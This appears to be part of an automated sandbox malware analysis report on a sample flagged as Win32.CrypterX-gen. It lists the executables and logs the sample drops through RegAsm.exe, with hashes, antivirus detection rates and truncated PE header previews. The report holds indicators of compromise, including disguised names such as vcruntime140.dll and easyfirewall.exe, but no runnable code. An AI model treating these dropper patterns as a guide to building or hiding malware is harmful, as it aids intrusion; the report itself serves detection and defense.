                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65275
                                                                                                                                                                                                                                Entropy (8bit):6.606957433424139
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86M:lw28V55At/zqw+Iq9ecbA2W8B
                                                                                                                                                                                                                                MD5:D24DA06AD00B080067E1CB66B7AE6E95
                                                                                                                                                                                                                                SHA1:11272695631DB45C51AEC598DFD26BF975FC4F88
                                                                                                                                                                                                                                SHA-256:525137D8F37119EA0C16C7CFF48999F196D126E7B8AE72C30F251636579DE535
                                                                                                                                                                                                                                SHA-512:51CFA065EF174A7E2B45221D350514F20DAACF382F533323A8442ECFF4F7389389CF10E93C97642F139582A104D992E9E05286B8C20551708ED1252F4D9AF471
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\userAEBAKJDGHI.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):390560
                                                                                                                                                                                                                                Entropy (8bit):7.988255985085606
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:0dx0vN4gouCbr2AVHvPFFo9c1WAClFgmZLb38kHh4auf7I2uceHyJDPvHa+V4TgW:0d4ouIvlvPQ+NCLp1j5B4aAlLX/M0uEO
                                                                                                                                                                                                                                MD5:992176158EF56D4A8A2C4EEFBA240126
                                                                                                                                                                                                                                SHA1:F90D45C270B3A692B8AF3E4809447202FB23BA7A
                                                                                                                                                                                                                                SHA-256:202AFF26415F9BCE8F95FEFA36568C65D28FCA7A511C0D2E23991DCADCED7847
                                                                                                                                                                                                                                SHA-512:E7327363B437ABF958F5ED358C53ED57AEF4946C35AFFAD036A36A790AB5CE9C19279FA74AB83B0E95318E044B9907991D17F9B8FCDD225556D6BC6FAC2F5E6B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 41%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................`.....................................S...................x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........................................................................b...8...<i......(P)N.V..v7N.C..9....g.P..62.....;.i....`....u..g...F....3.d.:....G.k.N.j.....y..w8w....PW.4k.h..iy.{....L,.[...q.=..p,w|.q...~.>}aNS..w..W.8S..>.X.....6...>Y.1T".n...OV.i.~b...p.......#S.....$o...^.v8...J....Aw...:.......$g&H..D.\.....tH...^.=53...]....F....6....hj5<.G..O..v5...~.%..i.....$#U..V.....r^HN.S.....1.L....fH.....ew....!......j>.....].....<..=B.k.\.{Bf

                                                                                                                                                                                                                                C:\Users\userHJDBAFIECG.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):423328
                                                                                                                                                                                                                                Entropy (8bit):7.9889468260390535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:ruFHcG6dc0A3+yfikluZRt6wfSYZc6pNLuvFJzPmhsiqvK5XEHAkgDkJEO:rCL3+YllubttfS16pNuTUqi1EE2EO
                                                                                                                                                                                                                                MD5:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                SHA1:5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
                                                                                                                                                                                                                                SHA-256:68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
                                                                                                                                                                                                                                SHA-512:5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 40%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*..............................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W*.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1IvCzYfqoD3SHvKt45m1rbHu.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1119
                                                                                                                                                                                                                                Entropy (8bit):5.345080863654519
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                                                                MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                                                                SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                                                                SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                                                                SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):522
                                                                                                                                                                                                                                Entropy (8bit):5.358731107079437
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                                                                                                                                                SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                                                                                                                                                SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                                                                                                                                                SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XO9lsdL5g6aUibu31TDcoBrI.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                                                                Entropy (8bit):5.3554278163807965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAt92n4M9XKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:ML9E4Ke84qXKDE4KhKiKhIE4Ks
                                                                                                                                                                                                                                MD5:783B5197F36053BBA046C2EF2515F80E
                                                                                                                                                                                                                                SHA1:49CB890E4C6536FD79EF1C7BE83949509B37A824
                                                                                                                                                                                                                                SHA-256:9513A3E5E55C5471F606E5E0B06C46CD4E357F46602BBF43F24E1E70572F5F91
                                                                                                                                                                                                                                SHA-512:6ACD461D38A8F665E6CF4B585B720ABEB0B3F8556C817E576991DF758D9FFE68479B2E634EB60223C7B7909F34C7A1853F13F0CEE3CB4F7C5951228A91BE24C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Yt_9y5LuIpBZXKd9EiYluKkG.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g2v2mVtOHdxh9ZgrtYde5yf0.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hd4YBtMwCrxG4M3aLLza89vv.exe.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11496960
                                                                                                                                                                                                                                Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
                                                                                                                                                                                                                                MD5:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 64%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ed9885d9aee_Day2[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3141632
                                                                                                                                                                                                                                Entropy (8bit):7.172503458895126
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:9f8m3F6fh7gW5YPOAfS7kALAcRbqIvKzHuXtkHZC1:9kmnW5mOkSgiRbIitk5I
                                                                                                                                                                                                                                MD5:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                SHA1:AC0F8C841D197A3DB368A3C646D242541ECE144B
                                                                                                                                                                                                                                SHA-256:279AF267D365013227156575DCF61B6977CE4051DD4632515BD224314CEA7C59
                                                                                                                                                                                                                                SHA-512:6328A2828A77FDAC906710552842A584208066033119F62AE0E97DA88DB37C35C02D368B554E58030D949E2DAD19715BF351284332706D939F8C6754D4DC9242
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 52%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..........)).. ...@)...@.. .......................`0...........@..................................)).K....`)......................@0.....O)).............................................. ............... ..H............text.....).. ....)................. ..`.sdata.......@).......).............@....rsrc........`).......).............@..@.reloc.......@0......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\easyfirewall[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22487040
                                                                                                                                                                                                                                Entropy (8bit):5.272510082812899
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Y/pLh1GGefzPX7NMW/uegYYFa5g1XkEN2shGZ5gzo/3KR:Yf1GPXpb/ue1Aa5g1NNDmv/3
                                                                                                                                                                                                                                MD5:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                SHA1:4D2C9D9B09226524868760263C873EDC664456A9
                                                                                                                                                                                                                                SHA-256:A9EA40670A686E175CC8C32E3FC6BA92505379303D6524F149022490A2DDA181
                                                                                                                                                                                                                                SHA-512:163006435A30B31FF0B079215EFC0CEDF6A624516AF1FFCCBC6144CFDB205B822029D523F28EC86E0391AF1B741771B860CF4D3492C87567A55F541A39C69D11
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 26%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..h...W..,.............@..............................`......*W...`... ...................................... Z.N....0Z.X....pZ......pM..f...........`\..P..........................._M.(....................4Z.X............................text... .h.......h.................`.``.data....+....i..,....h.............@.`..rdata...-...@p......&p.............@.`@.pdata...f...pM..h...TM.............@.0@.xdata..`.....P.......P.............@.0@.bss.....+....P.......................`..edata..N.... Z.......P.............@.0@.idata..X....0Z.......P.............@.0..CRT....p....PZ.......P.............@.@..tls.........`Z.......P.............@.@..rsrc........pZ.......P.............@.0..reloc...P...`\..R....R.............@.0B................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):423328
                                                                                                                                                                                                                                Entropy (8bit):7.9889468260390535
                                                                                                                                                                                                                                Encrypted:false
